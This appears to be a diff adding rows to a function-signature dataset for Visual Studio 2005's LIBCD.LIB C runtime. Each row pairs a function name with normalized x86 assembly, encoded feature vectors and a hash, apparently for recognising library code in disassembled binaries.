+__safe_fprem,CALL CONST\nRETN,aNbbxwAAAAAAAAAA,lBPDdi88BcwHmxoxLzwFzAAAAAAAAAAAhL8fjC/4PPIAAAAAB5saMYS/H4wCU+HPL/g88gAAAAAAAAAAAlPhzy/4PPIAAAAA,ad323e45dce4d3705570da26d82831b0f2cb5456,VS2005,LIBCD.LIB
+__setmode,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",iw0UTHWtSw1m+WK+da1LDU+LzAoAAAAAQwR9Vh4YujkGYojDOO5Cs4sNFEzkx7XQZvlivrHF49oAAAAAscXj2k+LzAoAAAAA5Me10LHF49oAAAAAHhi6OU+LzAoAAAAABmKIwzjuQrMeGLo5T4vMCgAAAAAAAAAA,[],a3db264ca4dc0caaf3add3be9d172741e9267b2e,VS2005,LIBCD.LIB
+__wtoi,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",gGd04AAAAAAAAAAA,[],ed3cf432ed52f073f37ac8a2c7f867d143281f87,VS2005,LIBCD.LIB
+__wtol,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",gGd04AAAAAAAAAAA,[],ed3cf432ed52f073f37ac8a2c7f867d143281f87,VS2005,LIBCD.LIB
+__wtoi64,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",gGd04AAAAAAAAAAA,[],6a58a732dd5a1c239b5245959c93901b8ab5639f,VS2005,LIBCD.LIB
+_toupper,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nSHL R32,CONST\nOR R32,R32\nMOV ESP,EBP\nPOP EBP",NvQ/7U+LzAoAAAAArH/ZTpyGUTigNzqh7PnuxZyGUTgAAAAAEIVrf4sNFEychlE4nIZROIwKuSjLzNIloDc6oU+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROAwS5f/LgsuVy8zSJU+LzAoAAAAAy4LLlU+LzAoAAAAAiw0UTAwS5f8kA8OdUlP1iJyGUTigNzqhnIZROMuCy5WchlE4MkMzXwwS5f/LgsuVjAq5KAAAAAAAAAAAy4LLlU+LzAoAAAAADBLl/6x/2U47hZT8JAPDnTJDM1/s+e7FnIZROMuCy5U29D/tO4WU/FJT9YgAAAAA,[],1e8465b33fc4420901ab1f5f2063c82e32bf495f,VS2005,LIBCD.LIB
+__toupper,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nPOP EBP\nRETN",cq9OeAAAAAAAAAAA,[],be7bd2e89cba0cb21dcbab553ec894f7ed02f5e6,VS2005,LIBCD.LIB
+_fgetpos,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",JKOZXE+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAuqQyFySjmVwNzMAB,[],e10b04dd14de8a3fcffc5e753b4a2fca605d5381,VS2005,LIBCD.LIB
+__fptrap,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",p08ongAAAAAAAAAA,OWijNHBlAGMf+fI7cGUAYwAAAAAAAAAAH/nyOwAAAAAAAAAA,c39b3979edc7a5651bf37510c19ce873e0ad7958,VS2005,LIBCD.LIB
+_wcsncat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",XqODJ30JSDQAAAAAKB22qD7Khtleo4MnGnYx7E+LzAoAAAAAT4vMCgAAAAAAAAAANaaI5l6jgyegNzqhoDc6oU+LzAoAAAAAXqODJygdtqgAAAAA6EX5tygdtqgAAAAAPsqG2X0JSDQAAAAAfQlINBp2Mew1pojm,[],c61e6570fdb42b78b8eddb482377ba0fa230898e,VS2005,LIBCD.LIB
+__wspawnle,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",dYMGr5yGUTghIEEl5FK8n5yGUTghIEElkvTRAeRSvJ91gwavO4+r5eRSvJ8AAAAAXqODJ0G4PzQAAAAAISBBJeRSvJ+S9NEBQbg/NANqB5leo4MnO4+r5eRSvJ8AAAAA5FK8nyEgQSVOf7zKA2oHmQAAAAAAAAAAdYMGryEgQSWchlE45FK8nyEgQSWchlE4kvTRAeRSvJ91gwavISBBJeRSvJ+S9NEBTn+8ykG4PzQAAAAAa11M0+RSvJ+S9NEBnIZROORSvJ+S9NEBkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vl5FK8n5yGUTghIEElnIZROORSvJ+S9NEB,[],2509a7f5f7c3247a3ac40c9ce7ccc3da5b560c25,VS2005,LIBCD.LIB
+_isalnum,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",chMCgCEfO6l61dia1RzUtgAAAAAAAAAAIR87qdUc1LYAAAAAetXYmtUc1LYAAAAA,[],be8f4e75d2419a9e336a7262cb0120fef6730b10,VS2005,LIBCD.LIB
+___isascii,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],CONST\nSBB R32,R32\nNEG R32\nPOP EBP\nRETN",PE88LwAAAAAAAAAA,[],f3863d3aad29f09accac7021905f99c6c2a992c6,VS2005,LIBCD.LIB
+___toascii,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nPOP EBP\nRETN",cq9OeAAAAAAAAAAA,[],445b8f5b4a5661a86ad1f9fd72f6e1087053ccc1,VS2005,LIBCD.LIB
+_isprint,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",1RzUtgAAAAAAAAAAIR87qdUc1LYAAAAAetXYmtUc1LYAAAAAchMCgCEfO6l61dia,[],ff6d6551e6e2dc407a92a4bf2918a3a58f94fda4,VS2005,LIBCD.LIB
+_iscntrl,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",7PnuxdUc1LYAAAAAchMCgGg6ytfs+e7F1RzUtgAAAAAAAAAAaDrK1wAAAAAAAAAA,[],f8f44aa04e74e6162d98d893da3df42b2fd48e54,VS2005,LIBCD.LIB
+___iscsymf,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",etXYmpyGUTgAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAnIZROJZz8F+chlE4EIVrfyEfO6l61dianIZROJZz8F/0Ke4IIR87qZyGUTgAAAAA9CnuCNUc1LYAAAAA,[],ec866448b79aa842379e3d1e8bec91a8f742f693,VS2005,LIBCD.LIB
+___iscsym,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32+R32*2]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",etXYmpyGUTgAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAnIZROJZz8F+chlE4EIVrf2qvKgt61dianIZROJZz8F/0Ke4Iaq8qC5Zz8F+chlE49CnuCNUc1LYAAAAA,[],adbf447751a547e8e311754c14071d5d0d70a5ce,VS2005,LIBCD.LIB
+_ispunct,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",7PnuxdUc1LYAAAAA1RzUtgAAAAAAAAAA9Bf+59Uc1LYAAAAAchMCgPQX/ufs+e7F,[],72c450114e49d36eaf27fcf1e42b6f209a49d0a2,VS2005,LIBCD.LIB
+_islower,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",1RzUtgAAAAAAAAAAaDrK1wAAAAAAAAAA7PnuxdUc1LYAAAAAchMCgGg6ytfs+e7F,[],b398b0505c79353c69cc76b9d4d02367e6825161,VS2005,LIBCD.LIB
+_isgraph,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",chMCgCEfO6l61dia1RzUtgAAAAAAAAAAIR87qdUc1LYAAAAAetXYmtUc1LYAAAAA,[],80fea4d7ed1cf9cc77b1c846c1f66f814670f519,VS2005,LIBCD.LIB
+_isxdigit,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",1RzUtgAAAAAAAAAAIR87qdUc1LYAAAAAetXYmtUc1LYAAAAAchMCgCEfO6l61dia,[],3a513753db4fc1c0be1522d728bce52a85edfe91,VS2005,LIBCD.LIB
+_isdigit,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",aDrK1wAAAAAAAAAA1RzUtgAAAAAAAAAAchMCgGg6ytfs+e7F7PnuxdUc1LYAAAAA,[],1125c3ddf12e187aca7bab1a8f34aa9d1bb12df2,VS2005,LIBCD.LIB
+_isspace,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",1RzUtgAAAAAAAAAAchMCgPQX/ufs+e7F7PnuxdUc1LYAAAAA9Bf+59Uc1LYAAAAA,[],2a6601a8796a7648f1b3e23340ffe863e4f369a5,VS2005,LIBCD.LIB
+_isalpha,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",1RzUtgAAAAAAAAAAIR87qdUc1LYAAAAAetXYmtUc1LYAAAAAchMCgCEfO6l61dia,[],94dc73982d88f3328856f228acbdadb87122c0ed,VS2005,LIBCD.LIB
+_isupper,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",9Bf+59Uc1LYAAAAA7PnuxdUc1LYAAAAAchMCgPQX/ufs+e7F1RzUtgAAAAAAAAAA,[],081108a5647349a0c3b3d228e116648215f60d61,VS2005,LIBCD.LIB
+_bsearch,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nNEG R32\nSBB R32,R32",XqODJybu4WUAAAAANRZyE3blFGYAAAAAJu7hZTC5eiwAAAAAMLl6LAGhdbMAAAAAAaF1swAAAAAAAAAAoDc6oTC5eiwAAAAAdDREpSbu4WXdrvNKnIZROHKQ+igHAakQBwGpEM13UkBxWpQ6cVqUOnFalDoAAAAAduUUZibu4WXdrvNKzXdSQF6jgycAAAAA3a7zSpyGUTgOlelMcVqUOl6jgycAAAAAcpD6KDUWchMAAAAADpXpTD7KhtlxWpQ6XqODJzUWchMAAAAAnIZROF6jgycMUU4/cVqUOnmyZ8sAAAAADFFOPzC5eiwAAAAAPsqG2XmyZ8sAAAAAebJny5yGUTigNzqh,[],c62cf4c057f8559d296cda9863233a31deedb6af,VS2005,LIBCD.LIB
+__fFEXP,"MOV BYTE PTR SS:[EBP+CONST],CONST\nXOR R8,R8\nFLDL2E\nFMULP ST(1),ST\nCALL CONST\nFLD1\nFADDP ST(1),ST\nTEST BYTE PTR SS:[EBP+CONST],CONST",beiRdwAAAAAAAAAAsXXuR1vQFeAAAAAAHKzJIm9mhoCymcisyZhnMdjNBKYYWqjHW9AV4NjNBKYYWqjHspnIrG9mhoAAAAAAb2aGgAGhdbMAAAAAGFqoxzUWchMAAAAA2M0EpjUWchMAAAAAAaF1swAAAAAAAAAANRZyE1Jo6lsAAAAAAQXvJ8mYZzGxde5HvTmwalvQFeABBe8nNRZyE23okXcAAAAAUmjqWzUWchMcrMki,[],a3830a90c74c1af82adae6646c298d5a294a222a,VS2005,LIBCD.LIB
+__rtinfpop,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",beiRdwAAAAAAAAAA,[],23219437760af8dc8495785cc7b2215759cb729f,VS2005,LIBCD.LIB
+__ffexpm1,"FLD ST\nFRNDINT\nFTST\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nWAIT\nMOV R8,BYTE PTR SS:[EBP+CONST]\nFXCH ST(1)",l3FRngGhdbMAAAAAYFJggZdxUZ4qs0LeKrNC3gGhdbMAAAAAAaF1swAAAAAAAAAAMkfmRAAAAAAAAAAA7EjSc2BSYIEyR+ZE,[],faf4ca39627caff07ebef7c57cef500a872b2982,VS2005,LIBCD.LIB
+__fFLN,"FLDLN2\nFXCH ST(1)\nFTST\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nWAIT\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",NRZyEwGhdbMAAAAATleniKJUKRnudxjTolQpGQGhdbM1FnIT7ncY0wAAAAAAAAAAAaF1swAAAAAAAAAA,[],3bb1480abd0e93745ac1cf07901b23aead9ec424,VS2005,LIBCD.LIB
+__rtinfnpopse,"FSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",veFwVwAAAAAAAAAA,[],0846fe7a8bb3c61a236429a8c7df553519d482bc,VS2005,LIBCD.LIB
+__rtinfnpop,"FSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",veFwVwAAAAAAAAAA,[],0ddd42c6c20de7711cd6d83a1d8abaa5d9fa136c,VS2005,LIBCD.LIB
+__rtinfpopse,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",beiRdwAAAAAAAAAA,[],243b9a8705092e469cffdcfe58ba512aca3e6b12,VS2005,LIBCD.LIB
+_fwprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTj+qN72kvTRAeRSvJ87j6vlZWXpEZyGUTgAAAAA/qje9gAAAAAAAAAA,[],f0f4be7f528b739f28a01b4a29a3896279f44c73,VS2005,LIBCD.LIB
+_strcat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",2M0EphFkM4PoVava6FWr2hFkM4PoVavaDeHVCwAAAAAAAAAA6FWr2hFkM4Neo4MnXqODJzUpQDIAAAAAK8VrCwAAAAAAAAAAEWQzgzwKGl0AAAAA2D80UAAAAAAAAAAAEWQzgzwKGl0AAAAAPlbIuglmNtRcpTmJPAoaXQlmNtRcpTmJXKU5idg/NFDKHLxByhy8QVylOYleo4MnXqODJwlmNtQAAAAAK/LdbzUpQDJcpTmJP99g6wlmNtQAAAAACWY21D/fYOvYzQSmXKU5iRFkM4NY2ig6WNooOlylOYk1KUAyNSlAMjUpQDKEcIcd2M0Eptg/NFDYzQSm2M0EpivFawtY2ig6WNooOg3h1QtY2ig6WNooOhuBMI1eo4MnEWQzgzwKGl0AAAAAhHCHHT5WyLrYzQSmXqODJz/fYOsAAAAAG4EwjQAAAAAAAAAA,[],a6ee7982da6658523706f50afc8f7ebf8d194155,VS2005,LIBCD.LIB
+_strcpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",WNooOg3h1QtY2ig6XqODJz/fYOsAAAAAXKU5idg/NFDKHLxBK8VrCwAAAAAAAAAAq15nETwKGl0AAAAAXqODJwlmNtQAAAAAyhy8QVylOYleo4Mn2D80UAAAAAAAAAAAWNooOhuBMI1eo4MnG4EwjQAAAAAAAAAAP99g6wlmNtQAAAAA2M0Eptg/NFDYzQSmPAoaXQlmNtRcpTmJDeHVCwAAAAAAAAAA2M0EpivFawtY2ig6CWY21D/fYOvYzQSm,[],269da68a18aef089c623ee69809bb45047be1c3c,VS2005,LIBCD.LIB
+__rmdir,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",mXjub0+LzAoAAAAAbGYbnJyGUTgAAAAAT4vMCgAAAAAAAAAAJu7hZU+LzAoAAAAAlnPwX5yGUTgAAAAAqGrdepZz8F9sZhucnIZROCbu4WWZeO5v,[],22920474c3a57beeaeeab380b9c4f579ebd09c8b,VS2005,LIBCD.LIB
+___crtGetCommandLineW,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nXOR R32,R32\nJMP SHORT CONST",0UiUpSbu4WXlMckR5FJmYaA3OqFeo4MnoDc6oU+LzAoAAAAAGaZm/yQDw50AAAAAZnkxNU+LzAoAAAAAC+QCNE+LzAoAAAAADczAAU+LzAoAAAAAEIVrfyQDw53LthmdJAPDndFIlKX+5e345THJEUMY4MoNzMABGaZm/yQDw50AAAAAy7YZnWZ5MTUZpmb/DczAAU+LzAoAAAAA/uXt+E+LzAoAAAAAy7YZncu2GZ0Zpmb/XqODJwvkAjQAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAQxjgyuRSZmENzMAB,[],4ac8df77113def9397687e2358808e2f0373316e,VS2005,LIBCD.LIB
+__wexecle,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",XqODJ0G4PzQAAAAA+iVSyQAAAAAAAAAAkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAAO4+r5eRSvJ8AAAAA5FK8nyEgQSVBuD80kvTRAeRSvJ87j6vluaShIZyGUTgAAAAA5FK8nyEgQSWchlE4Qbg/NPolUsleo4MnkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAAISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElnIZROORSvJ+S9NEBkvTRAeRSvJ87j6vl5FK8n5yGUTghIEEl,[],3b0a5410b7aee18ee830baec6add8ad87d00cbd1,VS2005,LIBCD.LIB
+__cputs,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",BIMTg5Zz8F97hJfUJAPDnZZz8F97hJfUcv8ZOyQDw50EgxODe4SX1NUc1LaWc/BflnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAA,[],a054b730ea94575b3ee1ed8908d161dfa709d382,VS2005,LIBCD.LIB
+__startOneArgErrorHandling,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-20\nMOV DWORD PTR SS:[EBP+CONST],R32\nFSTP QWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]",BlvRgzplNTwAAAAAl6nUKzplNTwGW9GDOmU1PAAAAAAAAAAA,[],a0b559b5d1ff514268cba90c359f808370551d7b,VS2005,LIBCD.LIB
+__startTwoArgErrorHandling,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-20\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",daXt8DplNTwGW9GDBlvRgzplNTwAAAAAkTCVaXWl7fAAAAAAOmU1PAAAAAAAAAAA,[],68e4a95ac7333820362f5d8b1ea7d29bebe82127,VS2005,LIBCD.LIB
+__strtime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",qLCc7AAAAAAAAAAA,[],a3c98902170f2299f168a94615c5f03ea98c4a0f,VS2005,LIBCD.LIB
+__fltin,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",zfJfpcLB62FSdUQ4nIZROJMjlm1uvzeHbr83hwAAAAAAAAAAnIZROA6V6UxFdnrSwsHrYUV2etKchlE4RXZ60m6/N4echlE4kyOWbQAAAAAAAAAAUnVEOJMjlm0AAAAADpXpTG6/N4echlE4,[],1eb7aa97eb6ac71b04375878f0c0d4c8f50a4634,VS2005,LIBCD.LIB
+__wcsrev,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",g65DXtUc1LbG4QenKB22qAmX7pxeo4MnxuEHp4OuQ14AAAAAgrZIwQmX7pxeo4MnXqODJygdtqgAAAAACZfunNUc1LbG4Qen1RzUtgAAAAAAAAAA,[],4d44b31a0cfde9bc887474aa73f16fdc421e6ad5,VS2005,LIBCD.LIB
+_strcspn,"MOV R32,R32\nADD ESP,CONST\nPOP R32\nLEAVE\nRETN",1ZDj64/izv0AAAAA5qY8cf0DDRHVkOPr/QMNERaROXoAAAAAFpE5erL1HPmqtBmvqrQZrxaROXqy9Rz5j+LO/f0DDRHVkOPrsvUc+QAAAAAAAAAA,[],6ab564df5e9ec1f8305acdda1aa8b85bda4db23a,VS2005,LIBCD.LIB
+__wexecve,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",6vF4T8A0rKgAAAAAXqODJ/ZV5+QAAAAAnIZROMB0owWDrkNenIZROF6jgyclFsgrg65DXvZV5+TAdKMFJRbIK16jgydQLtkuVcJDApyGUTgAAAAAwHSjBVAu2S69np4ZrydXXE+LzAoAAAAA9lXn5FAu2S69np4ZXqODJ9TZ7ssAAAAAwDSsqNUc1LYD/Bh6UC7ZLgAAAACvJ1dcg65DXtUc1LYD/Bh6A/wYegAAAAAAAAAAvZ6eGTUWchMAAAAA1RzUtgAAAAAAAAAAT4vMCgAAAAAAAAAA1Nnuy8A0rKiBPQJ8rydXXE+LzAoAAAAAzdJe7JyGUTichlE4nIZROMA0rKiBPQJ8gT0CfF6jgyfq8XhPNRZyE4OuQ14AAAAAUC7ZLlXCQwKvJ1dc,[],a85b84cc69dcb4147d89a2ec4a61b29f941be422,VS2005,LIBCD.LIB
+_raise,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",wZugLgAAAAAAAAAAT4vMCgAAAAAAAAAArydXXE+LzAoAAAAAYKQVE68nV1zBm6Au,[],2074be19bb31ff2a6ec33593262d787cdc24a8e1,VS2005,LIBCD.LIB
+_signal,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",XqODJ+x2hrsAAAAAoDc6oU+LzAoAAAAAY6Z8hE+LzAoAAAAAGaZm/50cG6sAAAAAB/iFeWOmfIQAAAAAXqODJ6A3OqEAAAAAnIZROE+rzBychlE4nIZROE+rzBychlE4nRwbq16jgyfBm6AunIZROE+rzBxeo4MnXqODJ2OmfIQAAAAAT6vMHE0oA0leo4MnVaatKDUWchOchlE4wZugLgAAAAAAAAAAnIZROJyGUTg1FnITNRZyE2OmfIQAAAAAXqODJ2OmfIQAAAAATSgDSex2hrsAAAAAnIZROJyGUTichlE4nIZROJyGUTichlE47HaGu6A3OqHNxT95nIZROJyGUThpzQYAac0GAJyGUTichlE4zcU/eV6jgydeo4MnnIZROCQDw52chlE4nIZROJ0cG6skA8OdJAPDnZ0cG6vwqDS78Kg0uwf4hXkZpmb/T4vMCgAAAAAAAAAAXqODJ6A3OqEAAAAA,[],4ab6d116cd260938c38dfd0c127e816e2b81acdd,VS2005,LIBCD.LIB
+__wcreat,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",1vvU4QAAAAAAAAAA,Elr+TgAAAAAAAAAA,06217e198d45677fcc922450b668fd1de11e2942,VS2005,LIBCD.LIB
+_fseek,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32",bRuS6jIkyIxo50nZnIZROORSvJ/b6hIUnIZROFCpBaGchlE4MekEoDIkyIwx6QSgnIZROFCpBaGchlE4dYMGr5yGUThi2SnJ5FK8n5yGUThi2SnJaOdJ2TIkyIwAAAAAa11M0+RSvJ/b6hIUYtkpyR4YujmchlE4nIZROFCpBaEeGLo5MekEoDIkyIxtG5LqUKkFoflhz+B+LNUtEzH0rzIkyIwAAAAAHhi6OcSg0gkAAAAA+WHP4DHpBKATMfSvMiTIjMSg0gkAAAAAxKDSCQAAAAAAAAAA2+oSFORSvJ91gwavfizVLTHpBKATMfSv,[],c6f8a2d0c51210bf18a6a1056d0ac6f37788f8ea,VS2005,LIBCD.LIB
+__disable,CLI\nRETN,OmU1PAAAAAAAAAAA,[],8856c36c4702b0536e20c0e6a5a4def003ab875e,VS2005,LIBCD.LIB
+__enable,STI\nRETN,OmU1PAAAAAAAAAAA,[],701ab1760683397e77e51ddcdd7a1a2ea82cc01a,VS2005,LIBCD.LIB
+__fgetchar,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[CONST]\nSUB R32,CONST\nMOV DWORD PTR DS:[CONST],R32\nCMP DWORD PTR DS:[CONST],0\nJCC CONST",B/TruYD9FYkvqIlJ1RzUtgAAAAAAAAAAgP0VidUc1LYAAAAAL6iJSdUc1LYAAAAA,[],885c326d4747d680e95f0bf545cbe712809b1c89,VS2005,LIBCD.LIB
+_getchar,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nPOP EBP\nRETN",8aGSbwAAAAAAAAAA,1RzUtgAAAAAAAAAAB/TruYD9FYkvqIlJL6iJSdUc1LYAAAAAgP0VidUc1LYAAAAA,bd4cedeae827845c98575cbef5808863d461a96d,VS2005,LIBCD.LIB
+__CrtDefaultAllocHook,"PUSH EBP\nMOV EBP,ESP\nMOV R32,CONST\nPOP EBP\nRETN",abaOawAAAAAAAAAA,[],4cef5ec878e0e7d1f1dcb473bd4210e4f0d00af4,VS2005,LIBCD.LIB
